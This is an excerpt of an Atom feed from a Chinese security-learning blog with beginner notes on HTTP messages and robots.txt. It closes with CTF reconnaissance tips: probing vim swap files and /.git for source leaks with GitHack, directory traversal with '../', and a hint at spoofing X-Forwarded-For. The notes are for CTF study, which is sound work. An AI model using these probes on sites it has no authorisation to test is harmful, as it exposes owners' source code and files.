      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="http"><a class="markdownIt-Anchor" href="#http"></a> HTTP</h1><h2 id="http概述"><a class="markdownIt-Anchor" href="#http概述"></a> HTTP概述</h2><p>HTTP 是一种用作获取诸如 HTML 文档这类资源的协议。它是 Web 上进行任何数据交换的基础，同时，也是一种客户端—服务器（client-server）协议。HTTP 是一种应用层的协议，通过 TCP 或 TLS（一种加密过的 TCP 连接）来发送。</p><p>请求是由接受方——通常是 Web 浏览器——发起的。完整网页文档通常由文本、布局描述、图片、视频、脚本等资源构成。客户端与服务端之间通过交换一个个独立的消息（而非数据流）进行通信。由客户端发出的消息被称作请求（request），由服务端发出的应答消息被称作响应（response）。</p><h2 id="http消息结构"><a class="markdownIt-Anchor" href="#http消息结构"></a> HTTP消息结构</h2><h3 id="客户端请求消息请求包结构"><a class="markdownIt-Anchor" href="#客户端请求消息请求包结构"></a> 客户端请求消息（请求包结构）</h3><h4 id="请求行"><a class="markdownIt-Anchor" href="#请求行"></a> 请求行</h4><h5 id="方法"><a class="markdownIt-Anchor" href="#方法"></a> 方法</h5><p>​                       如 GET、POST、PUT、DELETE等，指定要执行的操作。<img src="https://raw.githubusercontent.com/zkk1233/Picture/main/20241224235651762.png" alt="img" /></p><h6 id="get请求"><a class="markdownIt-Anchor" href="#get请求"></a> GET请求</h6><p>​         用于从服务器获取资源，常用于获取静态资源（网页、图片、文件等等）。<img src="https://raw.githubusercontent.com/zkk1233/Picture/main/20241224235651763.png" alt="img" /></p><p>​            get请求的参数传递方式</p><p>​           在 HTTP 请求中，GET 请求可以通过 URL 参数或者请求体的方式传递参数。</p><p>​           URL 参数：GET 请求可以通过 URL 中指定的 key-value 形式传递参数。</p><p>​            eg.<a href="http://example.com/search?q=test&amp;page=2">http://example.com/search?q=test&amp;page=2</a></p><h6 id="post请求"><a class="markdownIt-Anchor" href="#post请求"></a> POST请求</h6><p>​           用于向服务器提交数据，通常用于创建、更新或删除资源、上传文件、发送 JSON 数据<img src="https://raw.githubusercontent.com/zkk1233/Picture/main/20241224235651764.png" alt="img" /></p><p><code>post请求的参数传递方式：URL 参数和请求体。</code><br /><code>1.URL 参数：POST 请求可以通过 URL 中指定的 key-value 形式传递参数。例如，在访问如下 URL 时：</code><br /><code>eg.http://example.com/search?q=test&amp;page=2</code></p><p>2.请求体（仅适用于 POST、PUT、PATCH 请求）：当 POST、PUT 或 PATCH 请求的 URL 中没有指定参数时，参数会被放置在请求体中。请求体中的数据可以是表单数据、JSON 数据等。例如，使用 POST 请求将 JSON 数据发送到如下 URL 时：eg<code>.http://example.com/user</code></p><p>请求体中的 JSON 数据如下：</p><p><code>{  &quot;name&quot;: &quot;John Doe&quot;,  &quot;email&quot;: &quot;john.doe@example.com&quot; }</code></p><p>ps:</p><p>这里稍微提一嘴：在HTML表单提交时，特殊符号如空格、&amp;等应该用html编码后提交，以&amp;为例子，html不会讲&amp;视为普通符号，若A&amp;B是一个要提交的值，直接提交A&amp;B，html则会将其视为A、B两个值，编码为%26则不会，这里就能正常视为一个值。</p><h5 id="请求-uri统一资源标识符"><a class="markdownIt-Anchor" href="#请求-uri统一资源标识符"></a> 请求 URI（统一资源标识符）</h5><p>​                       请求的资源路径，通常包括主机名、端口号（如果非默认）、路径和查询字符串。<img src="C:%5CUsers%5C%E9%99%88%E6%98%8E%E6%99%BA%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20251007202424131.png" alt="image-20251007202424131" /></p><h4 id="请求头"><a class="markdownIt-Anchor" href="#请求头"></a> 请求头</h4><p>​             包含了客户端环境信息、请求体的大小（如果有）、客户端支持的压缩类型等。<br />​             常见的请求头包括Host、User-Agent、Accept、Accept-Encoding、Content-Length等。</p><p>注：POST 请求（包含 HTML 表单数据）需要主体<br />主体大致可分为两类：<br />1.单一资源（Single-resource）主体，由一个单文件组成。该类型的主体由两个标头定义：Content-Type和Content-Length<br />2.多资源（Multiple-resource）主体，由多部分主体组成，每一部分包含不同的信息位。通常是和 HTML 表单连系在一起。</p><h5 id="host"><a class="markdownIt-Anchor" href="#host"></a> Host</h5><p>指定请求的服务器的域名和端口号。</p><h5 id="user-agent"><a class="markdownIt-Anchor" href="#user-agent"></a> User-Agent</h5><p>包含发出请求的用户代理（浏览器）的信息，可用来浏览器伪造。</p><p>eg.</p><p><code>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36</code></p><p>其中：</p><p>浏览器：Mozilla/5.0</p><p>操作系统：Windows NT 10.0</p><p>平台：Win64; x64</p><p>浏览器核心：AppleWebKit/537.36</p><p>浏览器名称：Chrome</p><p>浏览器版本：58.0.3029.110</p><p>渲染引擎：Safari/537.36</p><h5 id="accept"><a class="markdownIt-Anchor" href="#accept"></a> Accept</h5><p>指定客户端能够处理的媒体类型。</p><h5 id="accept-language"><a class="markdownIt-Anchor" href="#accept-language"></a> Accept-Language</h5><p>指定客户端偏好的语言。</p><h5 id="accept-encoding"><a class="markdownIt-Anchor" href="#accept-encoding"></a> Accept-Encoding</h5><p>指定客户端能够处理的压缩算法。</p><h5 id="authorization"><a class="markdownIt-Anchor" href="#authorization"></a> Authorization</h5><p>用于身份验证的凭证。</p><h5 id="x-forwarded-for"><a class="markdownIt-Anchor" href="#x-forwarded-for"></a> X-Forwarded-For</h5><p>好用捏，不多说自行体会QAQ</p><h5 id="cookie"><a class="markdownIt-Anchor" href="#cookie"></a> cookie</h5><p>也是进行身份验证的头。ps:曲奇好吃捏</p><h4 id="协议-img"><a class="markdownIt-Anchor" href="#协议-img"></a> 协议        <img src="https://raw.githubusercontent.com/zkk1233/Picture/main/20241224235651761.png" alt="img" /></h4><h4 id="路径"><a class="markdownIt-Anchor" href="#路径"></a> 路径</h4><p>​             <code>/path/to/myfile.html</code> 、<code>/index.html</code>是 Web 服务器上资源的路径。</p><h4 id="参数"><a class="markdownIt-Anchor" href="#参数"></a> 参数</h4><p>​             ?key1=value1&amp;key2=value2 是提供给 Web 服务器的额外参数(参数是用 &amp; 符号分隔的键/值对列表) 。</p><h4 id="锚点"><a class="markdownIt-Anchor" href="#锚点"></a> 锚点</h4><p>​                <code>#SomewhereInTheDocument</code> 是资源本身的另一部分的锚点</p><p>​                锚点表示资源中的一种“书签”，给浏览器显示位于该“加书签”位置的内容的方向</p><p>​               <strong>#</strong> 后面的部分（也称为<strong>片段标识符</strong>）不会随请求被发送到服务器</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2025/11/16/HTTP/</id>
    <link href="https://cl1ck-t0.github.io/2025/11/16/HTTP/"/>
    <published>2025-11-16T01:20:19.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>HTTP协议</title>
    <updated>2026-02-22T12:56:22.598Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="robots协议"><a class="markdownIt-Anchor" href="#robots协议"></a> Robots协议</h1><p>Robots 协议（也称为爬虫协议、机器人协议等）是网站与爬虫之间的一种默契约定，用于指导爬虫哪些页面可以抓取，哪些不可以抓取，从而保护网站的数据隐私、性能以及避免过度抓取对服务器造成负担。其本质是一个放置在网站根目录下的文本文件（通常命名为 robots.txt），里面包含了一系列规则，告诉搜索引擎爬虫或其他网络爬虫在抓取网站页面时应遵循的指令。</p><h2 id="为什么需要-robots-协议"><a class="markdownIt-Anchor" href="#为什么需要-robots-协议"></a> 为什么需要 Robots 协议？</h2><p>保护网站隐私和敏感信息：某些页面可能包含用户个人数据、内部运营数据、未公开的内容等，网站管理员可以通过 Robots 协议阻止搜索引擎或其他爬虫获取这些敏感信息，防止信息泄露。<br />控制爬虫访问频率：爬虫过度频繁地访问网站可能会消耗大量服务器资源，影响网站的正常运行和其他用户的访问体验。Robots 协议可以限制爬虫在一定时间内的访问次数，避免对服务器造成过大压力。<br />引导爬虫抓取重点内容：网站管理员可以通过 Robots 协议明确告诉爬虫哪些页面是对用户有价值且希望被收录和展示的，引导爬虫优先抓取这些页面，提高网站重要内容在搜索引擎结果中的曝光率。</p><h2 id="robots-协议的操作过程-命令和工具"><a class="markdownIt-Anchor" href="#robots-协议的操作过程-命令和工具"></a> Robots 协议的操作过程、命令和工具</h2><h3 id="1操作过程"><a class="markdownIt-Anchor" href="#1操作过程"></a> 1.操作过程</h3><p>1.查找 robots.txt 文件：在浏览器地址栏中输入目标网站的根目录地址，然后加上 “/robots.txt”，例如 “<a href="https://www.example.com/robots.txt%E2%80%9D%EF%BC%88%E8%BF%99%E9%87%8C%E7%9A%84">https://www.example.com/robots.txt”（这里的</a> “<a href="http://www.example.com">www.example.com</a>” 需替换为实际的网站域名）。如果网站存在该协议文件，浏览器会显示其内容；如果不存在，则可能会返回 404 页面或其他提示信息。</p><p>2.解读 robots.txt 内容：文件中包含一系列的规则，每条规则由用户代理（User-agent）和允许或禁止访问的目录或文件路径（Disallow 和 Allow）组成。例如：<br />1.User-agent: * （表示适用于所有爬虫）<br />2.Disallow: /private/ （表示禁止所有爬虫访问网站根目录下的 “private” 文件夹及其子文件夹和文件）<br />3.Allow: /public/ （表示允许所有爬虫访问网站根目录下的 “public” 文件夹及其子文件夹和文件）</p><p>3.遵守协议规则进行爬虫开发或网站管理<br />对于爬虫开发者：在编写爬虫程序时，需要读取目标网站的 robots.txt 文件（可以使用相应的编程语言和库来实现，如 Python 中的urllib.robotparser模块），根据其中的规则来确定哪些页面可以抓取，哪些不可以抓取。例如，如果规则禁止访问某个目录，爬虫就应该避免向该目录下的页面发送请求。<br />对于网站管理员：合理编写 robots.txt 文件来控制爬虫对网站的访问。可以根据网站的结构、内容重要性以及隐私需求等因素，明确指定允许和禁止爬虫访问的区域。同时，需要定期检查和更新该文件，以适应网站内容和业务需求的变化。</p><h3 id="2命令"><a class="markdownIt-Anchor" href="#2命令"></a> 2.命令</h3><p>1.User-agent：指定规则适用的爬虫名称或通配符 “<em>”（表示适用于所有爬虫）。例如，“User-agent: Googlebot” 表示下面的规则仅适用于谷歌搜索引擎的爬虫；“User-agent: 2.</em>” 表示适用于所有未特别指定的爬虫。<br />Disallow：指定不允许爬虫访问的目录或文件路径。可以使用通配符 “*” 和 “来更精确地控制。例如，禁止访问网站根目录下的文件夹；” 禁止访问所有以.pdf 结尾的文件。<br />3.Allow：与 Disallow 相反，用于指定允许爬虫访问的目录或文件路径。如果在 Disallow 规则之后有 Allow 规则，Allow 规则将覆盖 Disallow 规则中相同路径的部分。例如，先有 “Disallow: /images/”，然后有 “Allow: /images/public/”，则表示除了 “/images/public/” 及其子文件夹外，其他 “/images/” 下的内容都不允许访问。<br />4.Sitemap（可选）：用于指定网站地图（Sitemap）的位置，帮助搜索引擎更全面地了解网站的结构和内容，以便更好地进行索引。例如，“Sitemap: <a href="https://www.example.com/sitemap.xml%E2%80%9D">https://www.example.com/sitemap.xml”</a> 告诉爬虫可以在该地址找到网站地图文件。</p><h3 id="3工具"><a class="markdownIt-Anchor" href="#3工具"></a> 3.工具</h3><p>1.用于查看 robots.txt 文件的浏览器：普通的网页浏览器（如 Chrome、Firefox、Edge 等）都可以直接在地址栏中输入网站的 robots.txt 文件地址来查看其内容。<br />2.编程语言相关库（用于爬虫开发中读取和遵循 robots.txt 规则）<br />Python：urllib.robotparser模块可以用于解析 robots.txt 文件并根据规则判断是否允许爬虫访问特定页面。</p><h3 id="4题外话"><a class="markdownIt-Anchor" href="#4题外话"></a> 4.题外话</h3><p>robots协议在ctf中常用于页面中搜寻信息，与此目的相同的简易操作我在这里也简单列举一些()</p><p>1.swp源码泄露：</p><p>直接访问/.index.php.swp          由于vim编辑器在编辑index.php文件时会生成临时交换文件，用于备份编辑过程中的内容，如果vim未正常关闭，则可能残留并被访问。</p><p>2.git源码泄露：</p><p>热知识：在网址后加上**/.git进行小测试，如果返回403状态码，说明是Git源码泄露**</p><p>使用工具GitHack,</p><p>3.利用目录穿越漏洞（目录遍历漏洞）：</p><p>漏洞的核心原理在于服务器端对用户输入的文件路径缺乏严格验证，如果应用程序在读取服务器上的文件时未对输入进行充分过滤，攻击方可以在路径中插入特殊序列，（如 …/），这些序列会指示系统向上回溯目录层级，从而突破安全限制，访问到本应受保护的文件。</p><p>eg.buuctf–N1BOOK-Web入门-afr-2~~(可自行去体验)~~</p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2025/11/15/Robots%E5%8D%8F%E8%AE%AE/</id>
    <link href="https://cl1ck-t0.github.io/2025/11/15/Robots%E5%8D%8F%E8%AE%AE/"/>
    <published>2025-11-15T15:50:20.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>Robots协议</title>
    <updated>2026-03-21T12:02:53.171Z</updated>
  </entry>
</feed>
